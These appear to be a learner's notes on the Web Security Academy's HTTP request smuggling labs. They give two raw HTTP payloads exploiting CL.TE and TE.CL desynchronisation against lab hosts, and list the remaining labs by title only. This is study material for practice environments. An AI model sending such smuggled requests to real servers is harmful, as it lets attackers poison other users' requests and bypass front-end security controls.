labs
Lab - 1: HTTP request smuggling, basic CL.TE vulnerability (P)
POST / HTTP/1.1
Host: 0a540036047255c3c3ba1b66004300fe.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
GLab - 2: HTTP request smuggling, basic TE.CL vulnerability (P)
POST / HTTP/1.1
Host: 0ae3007c043a9f14c0d3485f00be006d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
Connection: keep-alive
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
Lab - 3: HTTP request smuggling, obfuscating the TE header (P)
How to find
Lab - 4: HTTP request smuggling, confirming a CL.TE vulnerability via differential responses (P)
Lab - 5: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses (P)
How to exploit
Lab - 6: Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability (P)
Lab - 7: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability (P)
Lab - 8: Exploiting HTTP request smuggling to reveal front-end request rewriting (P)
Lab - 9: Exploiting HTTP request smuggling to deliver reflected XSS (P)
Lab - 10: H2.CL request smuggling (P)
Last updated